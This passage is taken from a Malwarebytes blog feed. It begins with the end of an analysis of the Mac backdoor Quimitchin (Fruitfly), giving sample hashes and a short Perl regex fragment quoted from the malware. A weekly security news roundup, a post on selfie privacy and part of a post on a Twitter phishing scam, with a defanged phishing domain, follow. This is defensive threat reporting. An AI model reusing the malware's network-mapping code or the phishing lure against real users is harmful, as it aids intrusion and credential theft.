We also observed the malware downloading a perl script, named “macsvc”, from the C&C server. This script uses mDNS to build a map of all the other devices on the local network, giving information about each device including its IPv6 and IPv4 addresses, name on the network and the port that is in use. It also appears to be making connection attempts to devices it finds on the network.

macsvc SHA256: b556c04c768d57af104716386fe4f23b01aa9d707cbc60385895e2b4fc08c9b0

Another file downloaded from the C&C server was named “afpscan”, and it seems to try to connect to other devices on the network.

afpscan SHA256: bbbf73741078d1e74ab7281189b13f13b50308cf03d3df34bc9f6a90065a4a55

The presence of Linux shell commands in the original script led us to try running this malware on a Linux machine, where we found that – with the exception of the Mach-O binary – everything ran just fine. This suggests that there may be a variant of this malware that is expressly designed to run on Linux, perhaps even with a Linux executable in place of the Mach-O executable. However, we have not found such a sample.

We were able to locate a couple Windows executable files on VirusTotal that communicate with the same C&C server. In addition, one contains strings that indicate that it uses the same libjpeg library from 1998 as the Mac Mach-O binary. Each of these samples were only ever submitted to VirusTotal once, in June and July of 2013, and are only detected by a few engines under generic names.

SHA256: 94cc470c0fdd60570e58682aa7619d665eb710e3407d1f9685b7b00bf26f9647 SHA256: 694b15d69264062e82d43e8ddb4a5efe4435574f8d91e29523c4298894b70c26

There are other indications that this malware has been circulating undetected for a long time. On one of the infected Macs, the launch agent file had a creation date in January of 2015. That’s not strong evidence of the true creation date, though, as those dates can easily be changed.

Further, there is a comment in the code in the macsvc file that indicates that a change was made for Yosemite (Mac OS X 10.10), which was released in October of 2014. This suggests that the malware has been around at least some time prior to Yosemite’s release.

if(/_(tcp|udp)\S*\s+(_\S+)$/){$s="$2._$1"; } elsif(/icloud\.com\.\s+(_[^\.]+\._(tcp|udp))\.\d+\.members\.btmm$/) {$s=$1; } # changed in yosemite elsif(/icloud\.com\.\s+\.\s+_autotunnel6$/){ next; }

Another clue, of course, is the age of some of the code, which could potentially suggest that this malware goes back decades. However, we shouldn’t take the age of the code as too strong an indication of the age of the malware. This could also signify that the hackers behind it really don’t know the Mac very well and were relying on old documentation. It could also be that they’re using old system calls to avoid triggering any kind of behavioral detections that might be expecting more recent code.

Ironically, despite the age and sophistication of this malware, it uses the same old unsophisticated technique for persistence that so many other pieces of Mac malware do: a hidden file and a launch agent. This makes it easy to spot, given any reason to look at the infected machine closely (such as unusual network traffic). It also makes it easy to detect and easy to remove.

The only reason I can think of that this malware hasn’t been spotted before now is that it is being used in very tightly targeted attacks, limiting its exposure. There have been a number of stories over the past few years about Chinese and Russian hackers targeting and stealing US and European scientific research. Although there is no evidence at this point linking this malware to a specific group, the fact that it’s been seen specifically at biomedical research institutions certainly seems like it could be the result of exactly that kind of espionage.

Malwarebytes will detect this malware as OSX.Backdoor.Quimitchin. (Why the name? Because the quimitchin were Aztec spies who would infiltrate other tribes. Given the “ancient” code, we thought the name fitting.) Apple calls this malware Fruitfly and has released an update that will be automatically downloaded behind the scenes to protect against future infections.

Categories: Techie Feeds

### A week in security (Jan 08 – Jan 14)

Malwarebytes - Mon, 01/16/2017 - 16:30

Last week, we talked about what Windows environmental variables are, more phishy sponsored tweets in the wild, and—if you haven’t actually considered this already—how to take selfies in a safe manner that doesn’t compromise your security and/or privacy.

We also took a deep dive into a post-holiday spam campaign, which delivered a booby-trapped Word document that downloads and executes a Neutrino bot. If you may recall, we published an article by hasherezade about the inner workings of the Neutrino botnet builder.

Finally, we revealed a clickjacking campaign that abuses Google’s AdSense while, at the same time, avoiding ad fraud bots. Senior Malware Intelligence Analyst Jérôme Segura provided us details on how this campaign works, how the criminals behind them profit from organic user clicks, and how this is related to a previous campaign that took advantage of European law on browser cookies.

Below are notable news stories and security-related happenings:

• WordPress, Joomla, And Magento Continue To Be The Most Hacked CMSs. “Based on statistical data gathered by Sucuri from 7,937 compromised websites, WordPress, Joomla, and Magento, in this order, continued to be the most hacked CMS platforms in the third quarter of 2016 (months of July, August, and September). Among all hacked websites, 74% ran WordPress, which isn’t surprising if we take into account the CMS’ massive market share among today’s sites.” (Source: Bleeping Computer)
• Is! Yahoo! Dead?! Why! Web! Biz! Will! Rename! To! Altaba! – The! Truth! “Marissa Mayer, the CEO of perennial drain-circler Yahoo!, will step down from its board of directors, along with five other members, after Verizon finishes gobbling up most of the internet portal. And once the acquisition is over, the remaining carcass of Yahoo! will change its name to Altaba Inc. In an SEC filing today, Yahoo! stated that once the Verizon takeover is complete – presumably after the US telco haggles Yahoo! down from its $4.8bn price tag following some serious brand tarnishing – Mayer will quit Yahoo!’s board of directors.” (Source: The Register) • Cyber Becomes Mainstream: The Lessons Learned For 2017. “In a year of change, one issue has become so tied to our daily lives that its emergence has been somewhat masked—and that issue is cyber. Just a few short years ago, cyber was seen as an edge issue that impacted technology companies. Now one need only look at the continuing discussion regarding the presidential election and the effect of the alleged interference by state-sponsored threat actors to see that cyber is embedded in our daily lives in a way that many did not imagine.” (Source: LegalTech News) • Spora Ransomware Works Offline, Has The Most Sophisticated Payment Site As Of Yet. “A new ransomware family made its presence felt today, named Spora, the Russian word for “spore.” This new ransomware’s most notable features are its solid encryption routine, ability to work offline, and a very well put together ransom payment site, which is the most sophisticated we’ve seen from ransomware authors as of yet.” (Source: Bleeping Computer) • Hello Kitty Database Of 3.3 Million Breached Credentials Surfaces. “A cache of data including 3.3 million user credentials belonging to Hello Kitty parent company Sanrio surfaced over the weekend. The breach was originally reported in December 2015, but at the time Sanrio denied any data was stolen as part of the breach. The breach was tied to a misconfigured MongoDB installation that was discovered by security researcher Chris Vickery.” (Source: Kaspersky’s Threatpost) • 49% Of Businesses Fell Victim To Cyber Ransom Attacks In 2016. “Nearly half of businesses report that they were the subject of a cyber-ransom campaign in 2016, according to Radware’s Global Application and Network Security Report 2016-2017. Data loss topped the list of IT professionals’ cyber attack concerns, the report found, with 27% of tech leaders reporting this as their greatest worry. It was followed by service outage (19%), reputation loss (16%), and customer or partner loss (9%).” (Source: Tech Republic) • Will 2017 Be The Year Of Ransomworm? “It’s safe to say that 2016 was the year of ransomware. More specifically, the year of crypto-ransomware, that nefarious variant that encrypts files and holds them captive until a ransom is paid. Since the release of Cryptolocker in late 2013, crypto-ransomware has exploded, and 2016 was a banner year. As a matter of fact, according to the FBI, cyber criminals used ransomware to steal more than$209 million from U.S. businesses in just the first quarter of 2016. And according to a recent report from Kaspersky Labs, from January to September of 2016, ransomware attacks targeting companies increased by a whopping 300 percent.” (Source: Help Net Security)
• FDA Confirms That St. Jude’s Cardiac Devices Can Be Hacked. “The FDA confirmed that St. Jude Medical’s implantable cardiac devices have vulnerabilities that could allow a hacker to access a device. Once in, they could deplete the battery or administer incorrect pacing or shocks, the FDA said on Monday. The devices, like pacemakers and defibrillators, are used to monitor and control patients’ heart functions and prevent heart attacks.” (Source: CNN Money)
• 5 Cyber Resolutions For 2017. “As we jump into the new year, here are five key resolutions to add to your list to have a cyber-secure 2017.” (Source: Orlando Business Journal)
• The Limitations Of Phishing Education. “In the past 12 months, millions of organizations, spanning all industries and sizes, became targets of cyberattacks. According to a recent report, 400,000 phishing sites were detected per month in 2016, and the Anti-Phishing Working Group concluded that phishing attacks reached an “all-time high” in the second quarter. Not only are attacks proliferating, but the perpetrators have evolved into professional cybercriminals with plenty of time and resources. For these reasons, it’s unrealistic to entrust the workforce with the massive responsibility of stopping phishing.” (Source: Dark Reading)
• Germany’s Plan To Fight Fake News. “In May 2015, hackers infected some 20,000 computers in Germany’s parliament with malicious software designed to steal sensitive data. The vast and damaging cyberattack was the most expansive in the government’s history. The culprits? Experts and officials blamed the hacking group “APT 28,” the same outfit that the US government says hacked the Democratic National Convention in July 2015 and helped Russia execute an extensive influence operation to discredit Hillary Clinton’s presidential campaign.” (Source: The Christian Science Monitor’s Passcode)
• 74 Percent Of Organizations Using Two-Factor Authentication Face User Complaints. “A recent SecureAuth survey of 300 cyber security professionals or IT decision makers found that 74 percent of respondents who use two-factor authentication (2FA) said they receive complaints about 2FA from their users — and 9 percent say they simply ‘hate it.’ ‘It’s not surprising that organizations are receiving an increasing amount of complaints about 2FA,’ SecureAuth CEO and founder Craig Lund said in a statement. ‘IT professionals face an ongoing battle as they are frequently forced to choose between user experience and increased security.'” (Source: eSecurity Planet)
• Beware Phishing Scams In Amazon Listings. “Be careful what you click: There’s a new phishing scam hitting Amazon listings that look like legitimate deals, offering great prices on ‘used – like new’ electronics. If you click these links on Amazon, you’ll be redirected to a very convincing Amazon-looking payment site, where the phishy merchant will grab your money and run.” (Source: Sophos’s Naked Security Blog)
• South African Bank Tells Its Tale Of Battling Ransom Attacks. “In November of 2015, a bank in South Africa received a ransom email from the Armada Collective, which was quickly followed by a teaser flood attack that the bank proactively mitigated. Sort of a shot across the bow to make sure the bank knew the criminals were serious. Bank officials didn’t flinch. According to a verbatim in Radware’s recently released Global Application & Security survey, the bank detected and mitigated the teaser flood attack before officials discovered the email, which had been sent to an unattended mailbox while the company was closed. With a hybrid DDoS mitigation solution in place, the flood attack had no impact and was immediately diverted to a scrubbing center for cleanup.” (Source: CSO)
• Alice: A Lightweight, Compact, No-Nonsense ATM Malware. “Trend Micro has discovered a new family of ATM malware called Alice, which is the most stripped down ATM malware family we have ever encountered. Unlike other ATM malware families, Alice cannot be controlled via the numeric pad of ATMs; neither does it have information stealing features. It is meant solely to empty the safe of ATMs. We detect this new malware family as BKDR_ALICE.A.” (Source: Trend Micro’s TrendLabs Security Intelligence Blog)
• Hacker Siblings Arrested For Targeting Italian Elite – Infecting 20k Emails. “Two London-based hackers namely 45-year old Giulio Occhionero and 48-year old Francesca Maria Occhionero have been arrested by Italian police for attempting to hack the communications of Italian elite including former Prime Minister Matteo Renzi and economist Mario Monti. The hackers, who happen to be siblings, not only tried to hack communications of Italian PM but also targeted other senior executives and business tycoons. It is being reported that the siblings were running a cyber-spying campaign to get sensitive financial and political information.” (Source: Hack Read)
• Is Your Data Breach Response Plan Good Enough? Stress Test It. “As the chances of a data breach incident increase, savvy businesses have invested time and thought in a response plan. But plans never survive first contact with the enemy. Stress test your incident response plan to find and resolve its weaknesses while time is on your side.” (Source: LegalTech News)
• UK Businesses Were Hit 230,000 Times Each By Cyber-attacks In 2016, Says Internet Service Provider. “Analysis has shown that U.K. businesses were subjected to an average of 230,000 cyber-attacks each in 2016. The number of attacks on individual companies’ firewalls breached 1,000 per day, on average, in November last year, according to internet service provider (ISP) Beaming.” (Source: CNBC)
• Airline Passengers’ Bookings And Info Leaked By Boarding Gate Displays. “An airport’s boarding gate displays leaked information that could have allowed attackers to gain access to passengers’ bookings and their personal details. While waiting for his flight at an airport in Europe, Candid Wueest of Symantec’s security research team saw a timed-out web browser window on one of the boarding gate displays. Curious, he noted the window’s IP address and tried to open it on his smartphone.” (Source: Graham Cluley’s Blog)
• How to Encourage Employees to Not Only Practice, but Actually Promote Cybersecurity Awareness. “It’s a curious reality that, although employees are swiftly punished for violating information security policy, such an extreme lack of interest in providing those employees with adequate cybersecurity awareness training exists amongst organizations. In a survey conducted by Enterprise Management Associates (EMA), only 56 percent of employees said that they receive cybersecurity awareness and policy training. While this finding is bewildering enough on its own, let’s delve deeper and ask an even more important question; of this 56 percent, how many organizations employ behavioral conditioning practices to reinforce the information their employees are being taught?” (Source: InfoSecurity Magazine)

Safe surfing, everyone!

The Malwarebytes Labs Team

Categories: Techie Feeds

### Selfie safety: keeping your security picture perfect

Malwarebytes - Fri, 01/13/2017 - 17:18

Ignore the banner image of the man taking a likely ill-advised selfie in the front of his car for now, because there’s fresh trouble brewing in photo filter land.

If you’re going to take selfies – and let’s face it, you probably will – it seems the latest “don’t do it like this” involves not revealing your fingerprints when flashing a peace sign. The reason? Researchers in Japan have warned that this information could be swiped and put to bad use. Before you start to panic, the good news is that this isn’t something that can be done easily – the chance of grabbing a high resolution shot of some fingerprints in a random selfie is low and you’d still need access to the device making use of said biometrics (like a phone) for this to be of any use to an attacker.

Thing is, there’s a whole bunch of other potentially dangerous situations you should probably avoid when taking a #nofilter picture, and most of these are of way more concern than your fingerprints. Some of the below, you may have already considered – and a few may be new to you. A couple of these may not even really qualify as selfies, but they’re still bad ideas and it won’t hurt to keep them in mind. Behold, the list of #selfiedoom:

1. Easily identifiable imagery in your photo

It may be that you’re not comfortable revealing your location on Instagram or Facebook, which is fine. You’ve taken precautions. You’ve switched off all the geotagging and location features across your social networks, but then blew it by taking a picture in your kitchen with Big Ben waving at you from outside the window. Or maybe you have friends over and they’re busy sending geotagged tweets from your balcony about how cool your new place is. Local shop receipts with addresses sitting on the table? A reflection of a suitcase with your address on the tag?

All of these things can be solved in advance by taking a few precautions and hiding what you don’t want on display (or just closing the window).

You may also have to ban non co-operative friends from your house, but we can’t really help with that one.

2. Selfies with credit cards/plane tickets/bills/everything else

For whatever reason, pictures like these tend to be very popular on Twitter – there’s no end of ill advised credit card closeups and other personal information thrown up on a daily basis.

Bad people can do all sorts of things with this information and none of it tends to be particularly good for the individual waving the item around (say goodbye to \$80,000 in 30 seconds or less).

3. Safety first

Spatial awareness is a wonderful thing, but all too often people forget about it at the worst possible moment in their quest to get the right shot. High up? Railings. Low down? Train tracks. Museum? Oh, no. Places you’re not supposed to be taking selfies in and you did and now everything has gone horribly wrong? You bet.

This is a very big problem, with extremely serious consequences for anybody not paying attention.

4. Malware selfies

This hasn’t really taken off, but there are Android Trojans out there which will ask a victim to take a selfie holding some form of personal identification. Ensure your mobile device is securely protected, don’t allow installs from unknown sources and always read the reviews for any new app on Google Play to minimize your chances of accidental infection.

One way or another, selfies are here to stay and will likely work their way into security solutions in the future. For now, think before you set up your perfect shot and have a safe, free from disaster selfie session.

Christopher Boyd

Categories: Techie Feeds

Malwarebytes - Thu, 01/12/2017 - 16:00

Another day, another couple of rogue sponsored tweets [1], [2] which lead to phishing.

There is a 0% chance this isn’t a phishing scheme pic.twitter.com/GvfwL6iUuf

— Mourt Goldman (@Ryan_Mourton) January 8, 2017

The account pushing the first phish has now been deleted, but it’s trivial to set up another one – and the phishing URL itself is still active, ready to be redeployed at a moment’s notice.

Shall we take a look?

The site is located at

verifiedaccounts(dot)us

and – like the older versions of this scam – is all about getting yourself verified.

The site kicks things off by asking for username, email address, account type, phone number, year of account creation, and (finally) associated password. It’s not long before they’re sniffing around your wallet, too…

“Please add a valid method of payment. We require you to link a credit card for identity verification purposes. You will not be charged. “